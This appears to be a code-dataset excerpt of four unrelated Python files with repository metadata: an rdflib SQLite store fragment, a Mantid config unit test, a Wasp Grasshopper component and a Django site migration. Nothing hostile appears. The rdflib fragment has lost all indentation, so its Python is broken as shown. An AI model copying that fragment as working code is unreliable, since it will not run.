#Note, this only removes the associated tables for the closed world universe given by the identifier
print "Destroyed Close World Universe %s ( in SQLite database %s)"%(self.identifier,home)
db.commit()
c.close()
db.close()
os.remove(os.path.join(home,self.identifier))
def EscapeQuotes(self,qstr):
"""
Ported from Ft.Lib.DbUtil
"""
if qstr is None:
return ''
tmp = qstr.replace("\\","\\\\")
tmp = tmp.replace('"', '""')
tmp = tmp.replace("'", "\\'")
return tmp
#This is overridden to leave unicode terms as is
#Instead of converting them to ascii (the default behavior)
def normalizeTerm(self,term):
if isinstance(term,(QuotedGraph,Graph)):
return term.identifier
elif isinstance(term,Literal):
return self.EscapeQuotes(term)
elif term is None or isinstance(term,(list,REGEXTerm)):
return term
else:
return term
    #Where-clause utility functions
    #The subject, predicate and object clause builders also accept lists, which
    #optimizes the subjects() and objects() utility functions (whose last arguments
    #are the object and predicate, respectively)
def buildSubjClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
if isinstance(s,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.subject'%tableName or 'subject') + " %s")
paramStrings.append(self.normalizeTerm(s))
elif isinstance(s,(QuotedGraph,Graph)):
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s")
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(subject,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[self.normalizeTerm(subject.identifier)]
else:
return subject is not None and "%s="%(tableName and '%s.subject'%tableName or 'subject')+"%s",[subject] or None
#Capable off taking a list of predicates as well (in which case sub clauses are joined with 'OR')
def buildPredClause(self,predicate,tableName):
if isinstance(predicate,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'),[predicate]
elif isinstance(predicate,list):
clauseStrings=[]
paramStrings = []
for p in predicate:
if isinstance(p,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.predicate'%tableName or 'predicate'))
else:
clauseStrings.append("%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s")
paramStrings.append(self.normalizeTerm(p))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return predicate is not None and "%s="%(tableName and '%s.predicate'%tableName or 'predicate')+"%s",[predicate] or None
#Capable of taking a list of objects as well (in which case sub clauses are joined with 'OR')
def buildObjClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
if isinstance(o,REGEXTerm):
clauseStrings.append(" REGEXP (%s,"+" %s)"%(tableName and '%s.object'%tableName or 'object'))
paramStrings.append(self.normalizeTerm(o))
elif isinstance(o,(QuotedGraph,Graph)):
clauseStrings.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
paramStrings.append(self.normalizeTerm(o.identifier))
else:
clauseStrings.append("%s="%(tableName and '%s.object'%tableName or 'object')+"%s")
paramStrings.append(self.normalizeTerm(o))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
elif isinstance(obj,(QuotedGraph,Graph)):
return "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[self.normalizeTerm(obj.identifier)]
else:
return obj is not None and "%s="%(tableName and '%s.object'%tableName or 'object')+"%s",[obj] or None
def buildContextClause(self,context,tableName):
context = context is not None and self.normalizeTerm(context.identifier) or context
if isinstance(context,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.context'%tableName or 'context'),[context]
else:
return context is not None and "%s="%(tableName and '%s.context'%tableName or 'context')+"%s",[context] or None
def buildTypeMemberClause(self,subject,tableName):
if isinstance(subject,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.member'%tableName or 'member'),[subject]
elif isinstance(subject,list):
clauseStrings=[]
paramStrings = []
for s in subject:
clauseStrings.append("%s.member="%tableName+"%s")
if isinstance(s,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(s.identifier))
else:
paramStrings.append(self.normalizeTerm(s))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return subject and u"%s.member = "%(tableName)+"%s",[subject]
def buildTypeClassClause(self,obj,tableName):
if isinstance(obj,REGEXTerm):
return " REGEXP (%s,"+" %s)"%(tableName and '%s.klass'%tableName or 'klass'),[obj]
elif isinstance(obj,list):
clauseStrings=[]
paramStrings = []
for o in obj:
clauseStrings.append("%s.klass="%tableName+"%s")
if isinstance(o,(QuotedGraph,Graph)):
paramStrings.append(self.normalizeTerm(o.identifier))
else:
paramStrings.append(self.normalizeTerm(o))
return '('+ ' or '.join(clauseStrings) + ')', paramStrings
else:
return obj is not None and "%s.klass = "%tableName+"%s",[obj] or None
def triples(self, (subject, predicate, obj), context=None):
"""
A generator over all the triples matching pattern. Pattern can
be any objects for comparing against nodes in the store, for
example, RegExLiteral, Date? DateRange?
quoted table: <id>_quoted_statements
asserted rdf:type table: <id>_type_statements
asserted non rdf:type table: <id>_asserted_statements
triple columns: subject,predicate,object,context,termComb,objLanguage,objDatatype
class membership columns: member,klass,context termComb
FIXME: These union all selects *may* be further optimized by joins
"""
quoted_table="%s_quoted_statements"%self._internedId
asserted_table="%s_asserted_statements"%self._internedId
asserted_type_table="%s_type_statements"%self._internedId
literal_table = "%s_literal_statements"%self._internedId
c=self._db.cursor()
parameters = []
if predicate == RDF.type:
#select from asserted rdf:type partition and quoted table (if a context is specified)
clauseString,params = self.buildClause('typeTable',subject,RDF.type, obj,context,True)
parameters.extend(params)
selects = [
(
asserted_type_table,
'typeTable',
clauseString,
ASSERTED_TYPE_PARTITION
),
]
elif isinstance(predicate,REGEXTerm) and predicate.compiledExpr.match(RDF.type) or not predicate:
#Select from quoted partition (if context is specified), literal partition if (obj is Literal or None) and asserted non rdf:type partition (if obj is URIRef or None)
selects = []
if not self.STRONGLY_TYPED_TERMS or isinstance(obj,Literal) or not obj or (self.STRONGLY_TYPED_TERMS and isinstance(obj,REGEXTerm)):
clauseString,params = self.buildClause('literal',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
literal_table,
'literal',
clauseString,
ASSERTED_LITERAL_PARTITION
))
if not isinstance(obj,Literal) and not (isinstance(obj,REGEXTerm) and self.STRONGLY_TYPED_TERMS) or not obj:
clauseString,params = self.buildClause('asserted',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
asserted_table,
'asserted',
clauseString,
ASSERTED_NON_TYPE_PARTITION
))
clauseString,params = self.buildClause('typeTable',subject,RDF.type,obj,context,True)
parameters.extend(params)
selects.append(
(
asserted_type_table,
'typeTable',
clauseString,
ASSERTED_TYPE_PARTITION
)
)
elif predicate:
#select from asserted non rdf:type partition (optionally), quoted partition (if context is speciied), and literal partition (optionally)
selects = []
if not self.STRONGLY_TYPED_TERMS or isinstance(obj,Literal) or not obj or (self.STRONGLY_TYPED_TERMS and isinstance(obj,REGEXTerm)):
clauseString,params = self.buildClause('literal',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
literal_table,
'literal',
clauseString,
ASSERTED_LITERAL_PARTITION
))
if not isinstance(obj,Literal) and not (isinstance(obj,REGEXTerm) and self.STRONGLY_TYPED_TERMS) or not obj:
clauseString,params = self.buildClause('asserted',subject,predicate,obj,context)
parameters.extend(params)
selects.append((
asserted_table,
'asserted',
clauseString,
ASSERTED_NON_TYPE_PARTITION
))
if context is not None:
clauseString,params = self.buildClause('quoted',subject,predicate, obj,context)
parameters.extend(params)
selects.append(
(
quoted_table,
'quoted',
clauseString,
QUOTED_PARTITION
)
)
q=self._normalizeSQLCmd(unionSELECT(selects,selectType=TRIPLE_SELECT_NO_ORDER))
self.executeSQL(c,q,parameters)
#NOTE: SQLite does not support ORDER BY terms that aren't integers, so the entire result set must be iterated
#in order to be able to return a generator of contexts
tripleCoverage = {}
result = c.fetchall()
c.close()
for rt in result:
s,p,o,(graphKlass,idKlass,graphId) = extractTriple(rt,self,context)
contexts = tripleCoverage.get((s,p,o),[])
contexts.append(graphKlass(self,idKlass(graphId)))
tripleCoverage[(s,p,o)] = contexts
for (s,p,o),contexts in tripleCoverage.items():
yield (s,p,o),(c for c in contexts)
CREATE_ASSERTED_STATEMENTS_TABLE = """
CREATE TABLE %s_asserted_statements (
subject text not NULL,
predicate text not NULL,
object text not NULL,
context text not NULL,
termComb tinyint unsigned not NULL)"""
CREATE_ASSERTED_TYPE_STATEMENTS_TABLE = """
CREATE TABLE %s_type_statements (
member text not NULL,
klass text not NULL,
context text not NULL,
termComb tinyint unsigned not NULL)"""
CREATE_LITERAL_STATEMENTS_TABLE = """
CREATE TABLE %s_literal_statements (
subject text not NULL,
predicate text not NULL,
object text,
context text not NULL,
termComb tinyint unsigned not NULL,
objLanguage varchar(3),
objDatatype text)"""
CREATE_QUOTED_STATEMENTS_TABLE = """
CREATE TABLE %s_quoted_statements (
subject text not NULL,
predicate text not NULL,
object text,
context text not NULL,
termComb tinyint unsigned not NULL,
objLanguage varchar(3),
objDatatype text)"""
CREATE_NS_BINDS_TABLE = """
CREATE TABLE %s_namespace_binds (
prefix varchar(20) UNIQUE not NULL,
uri text,
PRIMARY KEY (prefix))"""
|
aaronsw/watchdog
|
vendor/rdflib-2.4.0/rdflib/store/SQLite.py
|
Python
|
agpl-3.0
| 18,855 | 0.016547 |
from __future__ import (absolute_import, division, print_function)
import unittest
import os
import testhelpers
from mantid.kernel import (ConfigService, ConfigServiceImpl, config,
std_vector_str, FacilityInfo, InstrumentInfo)
class ConfigServiceTest(unittest.TestCase):
    __dirs_to_rm = []
    __init_dir_list = ''
    def test_singleton_returns_instance_of_ConfigService(self):
        self.assertTrue(isinstance(config, ConfigServiceImpl))
    def test_getLocalFilename(self):
        local = config.getLocalFilename().lower()
        self.assertTrue('local' in local)
    def test_getUserFilename(self):
        user = config.getUserFilename().lower()
        self.assertTrue('user' in user)
    def test_getFacilityReturns_A_FacilityInfo_Object(self):
        facility = config.getFacility()
        self.assertTrue(isinstance(facility, FacilityInfo))
    def test_getFacility_With_Name_Returns_A_FacilityInfo_Object(self):
        facility = config.getFacility("ISIS")
        self.assertTrue(isinstance(facility, FacilityInfo))
        self.assertRaises(RuntimeError, config.getFacility, "MadeUpFacility")
    def test_getFacilities_Returns_A_FacilityInfo_List(self):
        facilities = config.getFacilities()
        self.assertTrue(isinstance(facilities[0], FacilityInfo))
    def test_getFacilities_and_Facility_Names_are_in_sync_and_non_empty(self):
        facilities = config.getFacilities()
        names = config.getFacilityNames()
        self.assertTrue(len(names) > 0)
        self.assertEquals(len(names), len(facilities))
        for i in range(len(names)):
            self.assertEquals(names[i], facilities[i].name())
    def test_update_and_set_facility(self):
        self.assertFalse("TEST" in config.getFacilityNames())
        ConfigService.updateFacilities(os.path.join(ConfigService.getInstrumentDirectory(), "IDFs_for_UNIT_TESTING/UnitTestFacilities.xml"))
        ConfigService.setFacility("TEST")
        self.assertEquals(config.getFacility().name(), "TEST")
        self.assertRaises(RuntimeError, config.getFacility, "SNS")
    def test_getInstrumentReturns_A_InstrumentInfo_Object(self):
        self.assertTrue(isinstance(config.getInstrument("WISH"), InstrumentInfo))
        self.assertRaises(RuntimeError, config.getInstrument, "MadeUpInstrument")
    def test_service_acts_like_dictionary(self):
        test_prop = "algorithms.retained"
        self.assertTrue(config.hasProperty(test_prop))
        dictcall = config[test_prop]
        fncall = config.getString(test_prop)
        self.assertEquals(dictcall, fncall)
        self.assertNotEqual(config[test_prop], "")
        old_value = fncall
        config.setString(test_prop, "1")
        self.assertEquals(config.getString(test_prop), "1")
        config[test_prop] = "2"
        self.assertEquals(config.getString(test_prop), "2")
        config.setString(test_prop, old_value)
    def test_getting_search_paths(self):
        """Retrieve the search paths
        """
        paths = config.getDataSearchDirs()
        self.assertEquals(type(paths), std_vector_str)
        self.assert_(len(paths) > 0)
    def test_setting_paths_via_single_string(self):
        new_path_list = self._setup_test_areas()
        path_str = ';'.join(new_path_list)
        config.setDataSearchDirs(path_str)
        paths = config.getDataSearchDirs()
        # Clean up here so that if the assert fails
        # it doesn't bring all the other tests down
        self._clean_up_test_areas()
        self.assertEqual(len(paths), 2)
        self.assertTrue('tmp' in paths[0])
        self.assertTrue('tmp_2' in paths[1])
        self._clean_up_test_areas()
    def test_setting_log_channel_levels(self):
        testhelpers.assertRaisesNothing(self, config.setFileLogLevel, 4)
        testhelpers.assertRaisesNothing(self, config.setConsoleLogLevel, 4)
    def _setup_test_areas(self):
        """Create a new data search path string
        """
        self.__init_dir_list = config['datasearch.directories']
        # Set new paths - Make a temporary directory so that I know where it is
        test_path = os.path.join(os.getcwd(), "tmp")
        try:
            os.mkdir(test_path)
            self.__dirs_to_rm.append(test_path)
        except OSError:
            pass
        test_path_two = os.path.join(os.getcwd(), "tmp_2")
        try:
            os.mkdir(test_path_two)
            self.__dirs_to_rm.append(test_path_two)
        except OSError:
            pass
        return [test_path, test_path_two]
    def _clean_up_test_areas(self):
        config['datasearch.directories'] = self.__init_dir_list
        # Remove temp directories
        for p in self.__dirs_to_rm:
            try:
                os.rmdir(p)
            except OSError:
                pass
if __name__ == '__main__':
    unittest.main()
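# Illustrative sketch (not part of the original test file): the _setup/_clean_up helpers
# above save and restore 'datasearch.directories' around each test; the same read-modify-write
# pattern can be used in a user script to append an extra search directory. This requires a
# working mantid installation, and the directory name below is a placeholder.
def _append_search_dir(new_dir="/tmp/my_data"):
    current = config['datasearch.directories']
    if new_dir not in current:
        config['datasearch.directories'] = current + ';' + new_dir
    return config['datasearch.directories']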
| dymkowsk/mantid | Framework/PythonInterface/test/python/mantid/kernel/ConfigServiceTest.py | Python | gpl-3.0 | 4,880 | 0.002459 |
# Wasp: Discrete Design with Grasshopper plug-in (GPL) initiated by Andrea Rossi
#
# This file is part of Wasp.
#
# Copyright (c) 2017, Andrea Rossi <[email protected]>
# Wasp is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 3 of the License,
# or (at your option) any later version.
#
# Wasp is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Wasp; If not, see <http://www.gnu.org/licenses/>.
#
# @license GPL-3.0 <https://www.gnu.org/licenses/gpl.html>
#
# Significant parts of Wasp have been developed by Andrea Rossi
# as part of research on digital materials and discrete design at:
# DDU Digital Design Unit - Prof. Oliver Tessmann
# Technische Universität Darmstadt
#########################################################################
## COMPONENT INFO ##
#########################################################################
"""
Export Wasp information for DisCo VR software
-
Provided by Wasp 0.5
Args:
NAME: Rule group name. It will be used to activate/deactivate the rules contained in DisCo
GR: Rule grammars to be included in the group
Returns:
RULE_G: Rule Group instance
"""
ghenv.Component.Name = "Wasp_DisCo Rule Group"
ghenv.Component.NickName = 'RuleG'
ghenv.Component.Message = 'v0.5.005'
ghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application
ghenv.Component.Category = "Wasp"
ghenv.Component.SubCategory = "7 | DisCo VR"
try: ghenv.Component.AdditionalHelpFromDocStrings = "5"
except: pass
import sys
import json
import Rhino.Geometry as rg
import Grasshopper as gh
## add Wasp install directory to system path
wasp_loaded = False
ghcompfolder = gh.Folders.DefaultAssemblyFolder
if ghcompfolder not in sys.path:
    sys.path.append(ghcompfolder)
try:
    from wasp import __version__
    wasp_loaded = True
except:
    msg = "Cannot import Wasp. Is the wasp folder available in " + ghcompfolder + "?"
    ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Error, msg)
## if Wasp is installed correctly, load the classes required by the component
if wasp_loaded:
    from wasp.disco import DisCoRuleGroup
def main(group_name, rule_grammar):
    check_data = True
    ## check inputs
    if group_name is None:
        check_data = False
        msg = "No group name provided"
        ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
    if len(rule_grammar) == 0:
        check_data = False
        msg = "No rules grammar provided"
        ghenv.Component.AddRuntimeMessage(gh.Kernel.GH_RuntimeMessageLevel.Warning, msg)
    if check_data:
        return DisCoRuleGroup(group_name, rule_grammar)
    else:
        return -1
result = main(NAME, GR)
if result != -1:
    RULE_G = result
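# Illustrative sketch (not part of the original component): the validate-then-construct
# pattern used by main() can be exercised outside Grasshopper by swapping the runtime
# warnings for plain prints and DisCoRuleGroup for a stand-in class. Everything below
# is hypothetical and only mirrors the control flow above.
class _FakeRuleGroup(object):
    def __init__(self, name, grammar):
        self.name = name
        self.grammar = grammar

def _main_standalone(group_name, rule_grammar, group_klass=_FakeRuleGroup):
    check_data = True
    if group_name is None:
        check_data = False
        print("No group name provided")
    if len(rule_grammar) == 0:
        check_data = False
        print("No rules grammar provided")
    if check_data:
        return group_klass(group_name, rule_grammar)
    return -1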
| ar0551/Wasp | src/ghComp/Wasp_DisCo Rule Group.py | Python | gpl-3.0 | 3,209 | 0.011218 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
    """Set site domain and name."""
    Site = apps.get_model("sites", "Site")
    Site.objects.update_or_create(
        id=settings.SITE_ID,
        defaults={
            "domain": "choimirai.com",
            "name": "Django Tutorial"
        }
    )
def update_site_backward(apps, schema_editor):
    """Revert site domain and name to default."""
    Site = apps.get_model("sites", "Site")
    Site.objects.update_or_create(
        id=settings.SITE_ID,
        defaults={
            "domain": "example.com",
            "name": "example.com"
        }
    )
class Migration(migrations.Migration):
    dependencies = [
        ('sites', '0001_initial'),
    ]
    operations = [
        migrations.RunPython(update_site_forward, update_site_backward),
    ]
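# Illustrative sketch (not part of the original migration): after running
# `python manage.py migrate`, the record written by update_site_forward can be
# inspected from a Django shell. This assumes django.contrib.sites is in
# INSTALLED_APPS and SITE_ID is set, which the migration itself already requires.
def _verify_site_record():
    from django.contrib.sites.models import Site
    site = Site.objects.get(pk=settings.SITE_ID)
    return site.domain, site.name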
| gijigae/django-tutorial | django_tutorial/contrib/sites/migrations/0002_set_site_domain_and_name.py | Python | bsd-3-clause | 949 | 0 |